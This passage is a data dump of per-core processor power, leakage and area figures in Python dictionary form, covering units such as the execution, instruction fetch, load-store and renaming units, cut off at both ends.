'Execution Unit/Complex ALUs/Runtime Dynamic': 0.306527,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.652426,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.211937,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.366999,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.210484,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.78942,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.109464,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.28373,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.123257,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00768289,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.107553,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0568197,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.23081,
'Execution Unit/Register Files/Runtime Dynamic': 0.0645026,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.29611,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.56672,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.13255,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000178688,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000178688,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000154421,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 5.91139e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000816219,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00132802,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00175669,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0546222,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.47444,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.112839,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.185522,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.86416,
'Instruction Fetch Unit/Runtime Dynamic': 0.356067,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0516157,
'L2/Runtime Dynamic': 0.0161653,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.70941,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.732829,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.047632,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0476321,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.93525,
'Load Store Unit/Runtime Dynamic': 1.01537,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.117452,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.234905,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0416842,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0424563,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.216028,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0185079,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.44659,
'Memory Management Unit/Runtime Dynamic': 0.0609641,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 20.143,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.430016,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0160118,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.101218,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.547246,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 4.12836,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0654188,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.254071,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.323124,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0904724,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.145929,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0736599,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.310061,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.053934,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.51489,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.061045,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00379482,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.053159,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.028065,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.114204,
'Execution Unit/Register Files/Runtime Dynamic': 0.0318598,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.12835,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.247496,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.24887,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00010362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00010362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 9.3616e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 3.80798e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000403156,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000704012,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000873326,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0269796,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.71614,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0550252,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0916349,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.01794,
'Instruction Fetch Unit/Runtime Dynamic': 0.175217,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0267443,
'L2/Runtime Dynamic': 0.0089982,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.96831,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.3655,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0236557,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0236557,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.08002,
'Load Store Unit/Runtime Dynamic': 0.505817,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.058331,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.116662,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0207018,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.021102,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.106703,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00902499,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.298374,
'Memory Management Unit/Runtime Dynamic': 0.030127,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.5274,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.160581,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00603611,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0426464,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.209264,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.17829,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
